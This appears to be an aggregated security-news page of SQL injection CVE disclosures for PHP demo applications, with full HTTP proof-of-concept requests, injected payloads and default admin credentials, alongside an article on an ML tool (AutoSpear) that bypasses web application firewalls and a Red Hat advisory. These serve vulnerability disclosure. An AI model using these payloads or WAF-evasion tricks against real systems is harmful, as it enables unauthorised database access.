Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/admin/cargo_types/view_cargo_type.php?id=.

**Air Cargo Management System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html

Vulnerability File: /acms/admin/cargo\_types/view\_cargo\_type.php?id=

Vulnerability location: /acms/admin/cargo\_types/view\_cargo\_type.php?id=,id

\[+\] Payload: /acms/admin/cargo\_types/view\_cargo\_type.php?id=2%27%20and%20length(database())%20=7%20--+ // Leak place ---> id

Current database name: acms\_db,length is 7

GET /acms/admin/cargo\_types/view\_cargo\_type.php?id\=2%27%20and%20length(database())%20\=7%20\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=aaffvur9cmo069649rorqsbmeh
Connection: close

When length (database ()) = 6, Content-Length: 1161 

When length (database ()) = 7, Content-Length: 1043

CVE-2022-30371: bug_report/SQLi-3.md at main · k0xx11/bug_report

A team of university researchers finds a machine learning-based approach to generating HTTP requests that slip past Web application firewalls.

BLACK HAT ASIA 2022 — A team of university researchers used basic machine learning to identify patterns that common Web application firewalls (WAFs) fail to detect as malicious, but which can still deliver an attacker's payload, one of the researchers said in a presentation at the Black Hat Asia security conference in Singapore on Thursday.

The researchers from Zhejiang University in China started with common ways of transforming injection attacks to target Web-application databases using the common Structured Query Language (SQL). Rather than using a brute-force search of potential bypasses, the team created a tool, AutoSpear, that uses a pool of potential bypasses that can be combined using a weighted mutation strategy and then tested to determine the effectiveness of the bypasses at evading the security of WAF-as-a-service offerings.

The tool successfully bypassed — as measured by a false negative rate — all seven of the tested cloud-based WAFs with a variety of success, from a low of 3% for ModSecurity to a high of 63% for Amazon Web Services' and Cloudflare's WAFs, said Zhenqing Qu, a Zhejiang University graduate student and member of the AutoSpear team.

"The case studies have shown the potential \[of the tool\], because detection signatures were not robust due to various vulnerabilities," he said. "Just adding comments or whitespace can bypass some WAFs, but the most effective mutation depends on specific WAFs."

Web application firewalls are a common way to defend important cloud software and Web services from attack, filtering out common application attacks and attempts at injecting database commands, also known as SQL injection (SQLi). A 2020 study, for example, found that 4 in 10 security professionals believed that 50% of application-layer attacks that targeted their cloud application bypassed their WAF. Other attacks focus on compromising the WAF through its inspection of traffic.

In their presentation, the team from Zhejiang University focused on ways of transforming requests using 10 different techniques for the four common request methods: POST and GET requests, either using JSON encoding or not. The researchers found that the four different types of requests were treated the same by four different WAF vendors, while others approached the inputs differently.

By systematically mutating the requests with different combinations of the 10 techniques — such as inline comments, substituting whitespace, and substituting the common tautologies (that is, "1=1") for others (such as, "2<3") — the researchers found a set of transformations that performed best against each of the seven different WAFs.

"\[C\]ombining multiple mutation methods, AutoSpear is much more effective in bypassing mainstream WAF-as-a-service solutions due to their vulnerable detection signatures for semantic matching and regular expression matching," the researchers stated in their presentation slides.

SQL injection attacks continue to be a major risk for many companies. The OWASP Top-10 Web Security Risks rated the Injection class of vulnerabilities at the top of its list of risks in 2013 and 2017, and as the No. 3 risk in 2021. The list, released approximately every four years, uses more than 400 broad classes of weaknesses to determine the most significant threats for web applications.

The research team started with creating Web applications that had specific vulnerabilities, and then used its approach to transforms the known exploits into a unique request that the WAF would not catch.

Bypassing Web application firewalls typically focus on three broad approaches. At the architectural level, attackers can find ways to circumvent the WAF and directly access the origin server. At the protocol level, a variety of techniques can use errors or mismatches in encoding assumptions, such as HTTP request smuggling, to bypass WAFs. Finally, at the payload level, attackers can use a variety of encoding transformation to fool the WAF into failing to detect an attack, while still producing a valid request from the standpoint of the database server.

The transformations allowed the attacks to be successful anywhere from 9% of the time to nearly 100% of the time, depending on the WAF and the request format, the team stated in their presentation. In one case, the researcher found that just adding a newline character, "/n", bypassed a major WAF-as-a-service.

**AWS, Cloudflare Affected**

The research team reported the vulnerabilities to all seven WAF providers: AWS, Cloudflare, CSC, F5, Fortinet, ModSecurity, and Wallarm. Cloudflare, F5, and Wallarm have fixed their issues, Zhenqing said. The team also provided the vendors with bypass patterns that can be used to detect the most common types of transformations.

"The other four are still working with us, since the flaws cannot be easily patched," he said.

Transforming SQL Queries Bypasses WAF Security

Red Hat Security Advisory 2022-2232-01 - Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale. Data Grid 8.3.1 replaces Data Grid 8.3.0 and includes bug fixes and enhancements. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Data Grid 8.3.1 security update  
Advisory ID:       RHSA-2022:2232-01  
Product:           Red Hat JBoss Data Grid  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:2232  
Issue date:        2022-05-12  
CVE Names:         CVE-2020-36518 CVE-2021-38153 CVE-2022-0084   
=====================================================================

1. Summary:

An update for Red Hat Data Grid is now available.

 Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution.  
It increases application response times and allows for dramatically  
improving performance while providing availability, reliability, and  
elastic scale.

 Data Grid 8.3.1 replaces Data Grid 8.3.0 and includes bug fixes and  
enhancements. Find out more about Data Grid 8.3.1 in the Release Notes[3].

Security Fix(es):

* jackson-databind: denial of service via a large depth of nested objects  
[jdg-8] (CVE-2020-36518)

* kafka-clients: Kafka: Timing Attack Vulnerability for Apache Kafka  
Connect and Clients [jdg-8] (CVE-2021-38153)

* xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of  
stderr [jdg-8] (CVE-2022-0084)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

To install this update, do the following:

 1. Download the Data Grid 8.3.1 Server patch from the customer portal[²].  
2. Back up your existing Data Grid installation. You should back up  
databases, configuration files, and so on.  
3. Install the Data Grid 8.3.1 Server patch.  
4. Restart Data Grid to ensure the changes take effect.

For more information about Data Grid 8.3.1, refer to the 8.3.1 Release  
Notes[³]

4. Bugs fixed (https://bugzilla.redhat.com/):

2009041 - CVE-2021-38153 Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients  
2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr  
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects

5. References:

https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2021-38153  
https://access.redhat.com/security/cve/CVE-2022-0084  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=data.grid&downloadType=securityPatches&version=8.3  
https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.3/html-single/red_hat_data_grid_8.3_release_notes/index

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYn0zH9zjgjWX9erEAQhZLw/+JPEE+waFwwS+b4v4/LLIwTjtFhXPqZYP  
WArn7i/vjG6ktOsZU397wdlik4Sv+tmPVX+aElmXLnTALJiOsm7iWjEjuT8qPhqt  
c2V9xN6vEQC7V1IXdwbUQwlkt3r40XbfhsGc4KKHjA8J5fWECwkByM5ofQ4j59jO  
lxpIPa5yRjCV8/4p7lKAXFYMeBInZtb8i4c7pYVnA9Eq+o2bRpV9P3/ES9q8xGF8  
yVBC1Gt/fDZlmDznxlzUEih4HMxmW1uwQhZFHbw6jp6D0bYCn1wWrC6y7FYUmRJ6  
/13BnHV27naz+xBGuSA6EB+AKmzlA85NyIimN2h63AT8VJb2IYv0vM2JMb0JRdK0  
8SAE6hYmjodKxVcqANsBRiiea3vR9GTLN71zCXP8Pmk0dsI1GK29s574QuxUpKSQ  
YY8vXaL0K3j35IsGzmr7AvlYCQr1d3GPFaTnnj3XK+asRDMDrFvw8sCsNjLGRgHI  
dzZdcjpnIi3DXsp3ic1qRbZHpd9C/3o1r7hU++/nkkNNKXjGmzU+EAutaVHXxgLO  
XyuIIScDVb5kNrBpH5krzqU2TA31TFz0RGN5Am6vm8zc5rGyW7iMijAAreU8icgn  
Vt6KDpeDYuTffOBgo9WLR7kmo4xq7w94e1rDFxmGhL2OlsJI7S9gTxMhn/lONxTy  
IZnZKy4mPpA=  
=6Kqs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-2232-01

Insurance Management System 1.0 is vulnerable to SQL Injection via /insurance/editNominee.php?nominee_id=.

**Insurance Management System v1.0 by oretnom23 has SQL injection**

Author： k0xx

vendors: https://itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/

Login account: ahmed/12345 (Super Admin account)

Vulnerability File: /insurance/editNominee.php?nominee\_id=

Vulnerability location: /insurance/editNominee.php?nominee\_id=,nominee\_id=

\[+\] Payload: /insurance/editNominee.php?nominee\_id=1511989270-522970848%27%20and%20length(database())%20=4%20--+ // Leak place ---> nominee\_id=

Current database name: lims,length is 4

GET /insurance/editNominee.php?nominee\_id\=1511989270\-522970848%27%20and%20length(database())%20\=4%20\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=tmbv0mt5ff9hphhe0mtv4sghfq
Connection: close

When length (database ()) = 3, Content-Length: 4297

When length (database ()) = 4, Content-Length: 5523

CVE-2022-30002: bug_report/SQLi-5.md at main · k0xx11/bug_report

IBM Robotic Process Automation 21.0.0, 21.0.1, and 21.0.2 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 223022.

CVE-2022-22413: IBM Robotic Process Automation SQL injection CVE-2022-22413 Vulnerability Report

IonizeCMS v1.0.8.1 was discovered to contain a SQL injection vulnerability via the id_page parameter in application/models/article_model.php.

****1.Information****

Exploit Title: IonizeCMS-V1.0.8.1-Unverified post request parameters lead to sql injection  
Exploit date: 11.04.2022  
Exploit Author: ericfrank900528@gmail.com  
Vendor Homepage: https://github.com/ionize/ionize  
Affect Version: V1.0.8.1  
Description: SQL injection in Ionize CMS 1.0.8.1 allows attackers to execute commands remotely via a sql injection request from client.

****2.Vulnerability Description****

The exploit code is located in the project's application/models/article\_model.php file  
In the shift\_article\_ordering method, the code is as follows.  
The POST parameter id\_page is spliced into the sql statement without any processing or inspection, resulting in a SQL injection vulnerability.  

****3.How to Exploit****

3.1Construct normal packet and send. In the image below, you can see that there is a 2 second network delay.  

3.2Construct the injected data to execute sleep(1). It can be found that the delay is more than 4 seconds. It is speculated that there are 4 records in total, so sleep(1) is executed 4 times.  

3.3Construct the injection again to execute sleep(3), this time with a delay of 2 + 4*3 = 14 seconds if the guess is correct.  

****4.Suggestion****

Validate the parameters in the post request to avoid SQL injection

CVE-2022-29306: IonizeCMS-V1.0.8.1-Unverified post request parameters lead to sql injection · Issue #404 · ionize/ionize

Insurance Management System 1.0 is vulnerable to SQL Injection via /insurance/editAgent.php?agent_id=.

**Insurance Management System v1.0 by oretnom23 has SQL injection**

Author： k0xx

vendors: https://itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/

Login account: ahmed/12345 (Super Admin account)

Vulnerability File: /insurance/editAgent.php?agent\_id=

Vulnerability location: /insurance/editAgent.php?agent\_id=,agent\_id

\[+\] Payload: /insurance/editAgent.php?agent\_id=1610%27%20and%20length(database())%20=4%20--+ // Leak place ---> agent\_id

Current database name: lims,length is 4

GET /insurance/editAgent.php?agent\_id\=1610%27%20and%20length(database())%20\=4%20\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=tmbv0mt5ff9hphhe0mtv4sghfq
Connection: close

When length (database ()) = 3, Content-Length: 4385 

When length (database ()) = 4, Content-Length: 4893

CVE-2022-30001: bug_report/SQLi-3.md at main · k0xx11/bug_report

Money Transfer Management System 1.0 is vulnerable to SQL Injection via /mtms/admin/?page=transaction/send&id=, id.

**Money Transfer Management System v1.0 by oretnom23 has SQL injection**

**Author：** k0xx

vendors: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

Vulnerability File: /mtms/admin/?page=transaction/send&id=

Vulnerability location: /mtms/admin/?page=transaction/send&id=, id

\[+\] Payload: /mtms/admin/?page=transaction/send&id=1%27%20and%20length(database())%20=7%20--+ // Leak place ---> id

Current database name: mtms\_db,length is 7

GET /mtms/admin/?page\=transaction/send&id\=1%27%20and%20length(database())%20\=7%20\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bnvs2lhahed1884v0nf12nt52s
Connection: close
// Leak place ---> id

When length (database ()) = 7, Content-Length: 33302 

When length (database ()) = 8, Content-Length: 33339

Tag

#sql